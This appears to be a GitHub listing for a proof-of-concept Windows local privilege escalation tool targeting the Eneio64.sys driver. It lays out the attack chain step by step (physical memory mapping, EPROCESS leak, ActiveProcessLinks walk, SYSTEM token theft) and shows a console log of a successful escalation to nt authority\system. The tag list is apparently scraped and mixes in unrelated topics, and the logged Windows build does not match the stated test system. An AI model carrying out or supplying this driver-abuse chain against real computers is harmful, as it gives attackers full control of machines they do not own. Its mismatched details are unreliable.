S1lkys/Eneio64-LPE

GitHub: S1lkys/Eneio64-LPE

A PoC tool that exploits a vulnerability in the Eneio64.sys driver to achieve Windows local privilege escalation through physical memory mapping and token replacement.

Stars: 2 | Forks: 0

1. Open a handle to the vulnerable driver.
2. Map physical memory into user space.
3. Open a handle to the System process.
4. Query the current process's SystemHandleInformation table for the System handle, thereby leaking its EPROCESS address.
5. Walk the System EPROCESS ActiveProcessLinks Flink until the current process's PID is found.
6. Replace the current process's token with the System process's token.
7. Spawn a new PowerShell process.

Virtual-to-physical address translation uses the Superfetch method instead of leaking CR3 and walking the page tables.

Tested on Win11 21H2.

```
C:\Users\Public>.\Eneio64-LPE.exe
[+] Total physical memory: ~0x7fef2000 bytes
[+] Mapped physical memory at 000002A3A4FC0000
[+] Leaking System EPROCESS
[+] Opened handle to SYSTEM process (PID 4)
 > Current PID: 3932
 > Handle value: 0x5c
[+] Querying SystemHandleInformation table of current process
[+] Handle table queried successfully
 > Buffer size: 1048576 bytes
 > Resize rounds: 15
 > Total handles: 29211
[+] Searching for handle 0x5c in handle table
[+] Match found at index 29183 / 29211
 > PID: 3932
 > Handle: 0x5c
 > Object (System EPROCESS): 0xffff858ca1885040
[+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID
[+] Next Flink addr - 0x448 = Next EPROCESS
[+] Found current process (PID 3932) token at [0x72cd25f8]
[+] Patching current token with SYSTEM token
[!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ====
[+] Token replaced.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public>whoami
nt authority\system
```

For educational purposes only!
Tags: 0day hunting, C/C++, CVE-2020-12446, EDR bypass, Eneio64.sys, EPROCESS walking, NT AUTHORITY\SYSTEM, OpenCanary, PoC, RFI (remote file inclusion), SecList, shell emulation, SIP, Superfetch, token stealing, UML, web report viewer, Windows 11, Windows LPE, Windows security, transactional I/O, memory forensics, kernel security, kernel exploitation, protocol analysis, brute force, local privilege escalation, privilege escalation, vulnerability reproduction, physical memory mapping, red team techniques, cybersecurity, privacy protection, driver vulnerabilities